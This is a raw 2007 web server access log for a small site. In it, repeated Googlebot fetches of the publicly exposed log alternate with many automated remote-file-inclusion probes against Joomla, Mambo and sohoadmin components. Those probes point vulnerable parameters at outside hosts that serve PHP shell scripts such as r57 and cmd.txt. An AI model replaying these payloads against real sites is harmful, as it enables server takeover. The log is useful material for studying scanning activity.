208.66.194.5 - - [18/Aug/2007:22:11:29 -0700] "GET /logs/access.log HTTP/1.1" 200 498741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:22:36:14 -0700] "GET /logs/access.log HTTP/1.1" 200 498929 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:22:59:33 -0700] "GET /logs/access.log HTTP/1.1" 200 499064 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:23:25:11 -0700] "GET /logs/access.log HTTP/1.1" 200 499252 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:23:39:51 -0700] "GET /logs/access.log HTTP/1.1" 200 499387 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:24 -0700] "GET /?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ HTTP/1.0" 200 10036 "http://us.f524.mail.yahoo.com/ym/ShowLetter?MsgId=262_0_22_1242_835_0_573_1520_326655891_oSOYkYn4Ur6Rg9SuJfSMZylF0qCfl_ZIAhxTnM9GZ8Qb9Lpx.fSfXywpnVMP9MuORmD7G9pE1R9stR9OEDaYbkv_BQcrhubPppYjHBgL4NVQ73HTDRpmfTVZdzsanIYkXMbuQ6Kvd6mYVLc3E1ZW_1mgym7om0gr88FREOJQziw-&Idx=0&YY=3280&y5beta=yes&y5beta=yes&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=%40B%40Bulk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:26 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.0" 200 709 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:26 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.0" 200 47456 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:26 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.0" 200 33964 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:27 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.0" 200 250 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:28 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.0" 200 273 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:28 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.0" 200 303 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:30 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.0" 200 298 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
217.218.236.173 - - [18/Aug/2007:23:53:32 -0700] "GET /images/promo_mail.gif HTTP/1.0" 200 1469 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/dD1WZ3g4bmJadWlEeD5oXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:23:54:06 -0700] "GET /logs/access.log HTTP/1.1" 200 502493 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:00:08:05 -0700] "GET /logs/access.log HTTP/1.1" 200 502628 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:00:22:01 -0700] "GET /logs/access.log HTTP/1.1" 200 502816 "-" "Googlebot-Image/1.0" "www.projectpr.com"
216.188.197.8 - - [19/Aug/2007:00:23:00 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.146.64.158 - - [19/Aug/2007:00:33:39 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 290 "-" "-" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:00:44:45 -0700] "GET /logs/access.log HTTP/1.1" 200 503354 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:01:09:55 -0700] "GET /logs/access.log HTTP/1.1" 200 503489 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:01:34:01 -0700] "GET /logs/access.log HTTP/1.1" 200 503624 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:01:34:04 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.803" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:01:34:04 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:01:34:05 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:01:47:40 -0700] "GET /logs/access.log HTTP/1.1" 200 504574 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:01:49:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:01:49:11 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:02:02:07 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:02:11:10 -0700] "GET /logs/access.log HTTP/1.1" 200 505491 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
212.59.7.10 - - [19/Aug/2007:02:35:08 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://148.245.107.2/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
212.59.7.10 - - [19/Aug/2007:02:35:09 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://148.245.107.2/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
212.59.7.10 - - [19/Aug/2007:02:35:09 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://148.245.107.2/x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:02:36:30 -0700] "GET /logs/access.log HTTP/1.1" 200 506321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:02:50:45 -0700] "GET /logs/access.log HTTP/1.1" 200 506509 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:03:06:07 -0700] "GET /logs/access.log HTTP/1.1" 200 506697 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:03:21:29 -0700] "GET /logs/access.log HTTP/1.1" 200 506885 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
59.96.43.158 - - [19/Aug/2007:03:25:55 -0700] "GET / HTTP/1.1" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:03:45:25 -0700] "GET /logs/access.log HTTP/1.1" 200 507228 "-" "Googlebot-Image/1.0" "www.projectpr.com"
72.29.79.246 - - [19/Aug/2007:03:49:47 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://geocities.com/cmd_city/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.79.246 - - [19/Aug/2007:03:49:47 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://geocities.com/cmd_city/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.29.79.246 - - [19/Aug/2007:03:49:48 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://geocities.com/cmd_city/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:03:59:49 -0700] "GET /logs/access.log HTTP/1.1" 200 508122 "-" "Googlebot-Image/1.0" "www.projectpr.com"
88.241.3.183 - - [19/Aug/2007:04:04:19 -0700] "PUT /2x.htm HTTP/1.1" 403 163 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:04:24:36 -0700] "GET /logs/access.log HTTP/1.1" 200 508419 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
66.166.236.187 - - [19/Aug/2007:04:33:14 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:04:38:11 -0700] "GET /logs/access.log HTTP/1.1" 200 508851 "-" "Googlebot-Image/1.0" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:04:56:27 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:04:56:28 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.31.201.252 - - [19/Aug/2007:04:56:28 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:05:09:51 -0700] "GET /logs/access.log HTTP/1.1" 200 509748 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:05:26:24 -0700] "GET /logs/access.log HTTP/1.1" 200 509883 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
85.88.3.18 - - [19/Aug/2007:05:31:41 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.88.3.18 - - [19/Aug/2007:05:31:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.12.31.79 - - [19/Aug/2007:05:45:58 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.etriple.com/sc/comandi/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.12.31.79 - - [19/Aug/2007:05:46:00 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.etriple.com/sc/comandi/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.214.29.115 - - [19/Aug/2007:05:47:00 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:05:53:08 -0700] "GET /logs/access.log HTTP/1.1" 200 511217 "-" "Googlebot-Image/1.0" "www.projectpr.com"
85.214.29.115 - - [19/Aug/2007:06:04:00 -0700] "GET /logs/access.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.29.115 - - [19/Aug/2007:06:04:00 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:06:16:48 -0700] "GET /logs/access.log HTTP/1.1" 200 511853 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.19.124 - - [19/Aug/2007:06:40:21 -0700] "GET /robots.txt HTTP/1.0" 404 240 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.20.109 - - [19/Aug/2007:06:40:22 -0700] "GET /navigation_bars/?D=D HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:06:41:22 -0700] "GET /logs/access.log HTTP/1.1" 200 512431 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:07:09:22 -0700] "GET /logs/access.log HTTP/1.1" 200 512619 "-" "Googlebot-Image/1.0" "www.projectpr.com"
74.6.24.154 - - [19/Aug/2007:07:10:43 -0700] "GET /logs/?M=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:07:23:14 -0700] "GET /logs/access.log HTTP/1.1" 200 512944 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
193.205.80.54 - - [19/Aug/2007:07:30:29 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.192.125.110 - - [19/Aug/2007:07:36:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://e-matma.pl/ip.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.805" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:07:37:49 -0700] "GET /logs/access.log HTTP/1.1" 200 513588 "-" "Googlebot-Image/1.0" "www.projectpr.com"
200.175.197.32 - - [19/Aug/2007:07:45:04 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:07:54:13 -0700] "GET /logs/access.log HTTP/1.1" 200 513944 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
87.192.125.110 - - [19/Aug/2007:08:02:45 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://e-matma.pl/ip.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.805" "www.projectpr.com"
87.192.125.110 - - [19/Aug/2007:08:02:46 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://e-matma.pl/ip.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.24.223 - - [19/Aug/2007:08:03:54 -0700] "GET /navigation_bars/?N=A HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:08:08:58 -0700] "GET /logs/access.log HTTP/1.1" 200 514781 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:08:24:03 -0700] "GET /logs/access.log HTTP/1.1" 200 514916 "-" "Googlebot-Image/1.0" "www.projectpr.com"
200.175.197.32 - - [19/Aug/2007:08:33:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.borg-birkfeld.at/bibliothek/cmd.php?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:08:38:30 -0700] "GET /logs/access.log HTTP/1.1" 200 515255 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:08:53:52 -0700] "GET /logs/access.log HTTP/1.1" 200 515390 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
65.98.88.234 - - [19/Aug/2007:09:06:33 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.98.88.234 - - [19/Aug/2007:09:06:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.98.88.234 - - [19/Aug/2007:09:06:35 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:09:13:04 -0700] "GET /logs/access.log HTTP/1.1" 200 516301 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
200.175.197.32 - - [19/Aug/2007:09:15:14 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 295 "-" "-" "www.projectpr.com"
64.34.193.87 - - [19/Aug/2007:09:16:32 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.34.193.87 - - [19/Aug/2007:09:18:45 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 298 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:09:32:57 -0700] "GET /logs/access.log HTTP/1.1" 200 517145 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
217.71.208.150 - - [19/Aug/2007:09:33:05 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/sa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.71.208.150 - - [19/Aug/2007:09:33:05 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/sa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.3.192.124 - - [19/Aug/2007:09:58:11 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://partyraiser.interfree.it/sa.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [19/Aug/2007:09:58:11 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://partyraiser.interfree.it/sa.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [19/Aug/2007:09:58:12 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://partyraiser.interfree.it/sa.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:10:05:14 -0700] "GET /logs/access.log HTTP/1.1" 200 518495 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
200.175.197.32 - - [19/Aug/2007:10:12:23 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.borg-birkfeld.at/bibliothek/cmd.php?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:10:21:10 -0700] "GET /logs/access.log HTTP/1.1" 200 518887 "-" "Googlebot-Image/1.0" "www.projectpr.com"
62.141.56.174 - - [19/Aug/2007:10:44:27 -0700] "GET /logs/components/com_forum/forum.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:10:47:48 -0700] "GET /logs/access.log HTTP/1.1" 200 519224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
200.175.197.32 - - [19/Aug/2007:10:59:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.projectpr.com"
208.66.194.5 - - [19/Aug/2007:11:01:52 -0700] "GET /logs/access.log HTTP/1.1" 200 519621 "-" "Googlebot-Image/1.0" "www.projectpr.com"
62.75.193.80 - - [19/Aug/2007:11:03:06 -0700] "GET /logs/access.log//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [19/Aug/2007:11:03:06 -0700] "GET //modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [19/Aug/2007:11:03:06 -0700] "GET /logs//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
87.118.104.180 - - [19/Aug/2007:11:05:14 -0700] "GET /logs/access.log/http://eliairva.altervista.org/safe.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803" "www.projectpr.com"
87.118.104.180 - - [19/Aug/2007:11:05:15 -0700] "GET /http://eliairva.altervista.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.118.104.180 - - [19/Aug/2007:11:05:15 -0700] "GET /logs/http://eliairva.altervista.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.75.193.80 - - [19/Aug/2007:11:05:55 -0700] "GET /logs/access.log//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [19/Aug/2007:11:05:55 -0700] "GET //modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.75.193.80 - - [19/Aug/2007:11:05:56 -0700] "GET /logs//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
205.234.252.99 - - [19/Aug/2007:11:08:32 -0700] "GET /logs/access.log//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.252.99 - - [19/Aug/2007:11:08:32 -0700] "GET //modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.252.99 - - [19/Aug/2007:11:08:33 -0700] "GET /logs//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.252.99 - - [19/Aug/2007:11:09:13 -0700] "GET /logs/access.log//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.252.99 - - [19/Aug/2007:11:09:13 -0700] "GET //modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.252.99 - - [19/Aug/2007:11:09:13 -0700] "GET /logs//modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.138.191.60 - - [19/Aug/2007:11:16:20 -0700] "GET /logs/access.log//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.138.191.60 - - [19/Aug/2007:11:16:21 -0700] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.138.191.60 - - [19/Aug/2007:11:16:21 -0700] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://usuarios.arnet.co